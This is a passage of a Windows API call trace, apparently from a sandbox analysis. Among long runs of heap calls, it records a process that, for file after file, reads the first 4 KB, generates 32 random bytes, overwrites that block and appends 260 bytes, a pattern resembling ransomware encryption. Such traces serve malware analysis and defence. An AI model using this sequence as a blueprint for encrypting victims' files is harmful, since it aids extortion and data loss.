dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.634] GetProcessHeap () returned 0x280000 [0075.634] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.635] GetProcessHeap () returned 0x280000 [0075.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.635] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.636] WriteFile (in: hFile=0x7a0, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.636] WriteFile (in: hFile=0x7a0, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.636] GetProcessHeap () returned 0x280000 [0075.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0075.636] GetProcessHeap () returned 0x280000 [0075.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.636] GetProcessHeap () returned 0x280000 [0075.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.636] CloseHandle (hObject=0x7a0) returned 1 [0075.637] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 18 [0075.637] SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.637] ReadFile (in: hFile=0x7cc, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.637] SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.637] GetProcessHeap () returned 0x280000 [0075.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.637] GetProcessHeap () returned 0x280000 [0075.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.638] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.638] GetProcessHeap () returned 0x280000 [0075.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0075.638] ReadFile (in: hFile=0x7cc, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.755] SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.755] WriteFile (in: hFile=0x7cc, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.755] GetProcessHeap () returned 0x280000 [0075.755] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.755] GetProcessHeap () returned 0x280000 [0075.755] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.755] GetProcessHeap () returned 0x280000 [0075.755] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.756] GetProcessHeap () returned 0x280000 [0075.756] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.757] GetProcessHeap () returned 0x280000 [0075.757] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.757] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975a0 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975a0 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.758] GetProcessHeap () returned 0x280000 [0075.758] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.758] GetProcessHeap () returned 0x280000 [0075.759] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.759] GetProcessHeap () returned 0x280000 [0075.759] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.760] SetFilePointerEx (in: hFile=0x7cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.760] WriteFile (in: hFile=0x7cc, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.760] WriteFile (in: hFile=0x7cc, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.760] GetProcessHeap () returned 0x280000 [0075.760] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0075.761] GetProcessHeap () returned 0x280000 [0075.761] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.761] GetProcessHeap () returned 0x280000 [0075.761] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.761] CloseHandle (hObject=0x7cc) returned 1 [0075.763] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 19 [0075.763] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.763] ReadFile (in: hFile=0x7d0, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.763] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.763] GetProcessHeap () returned 0x280000 [0075.763] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.763] GetProcessHeap () returned 0x280000 [0075.763] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.763] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.763] GetProcessHeap () returned 0x280000 [0075.763] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0075.763] ReadFile (in: hFile=0x7d0, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.818] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.818] WriteFile (in: hFile=0x7d0, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.818] GetProcessHeap () returned 0x280000 [0075.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, 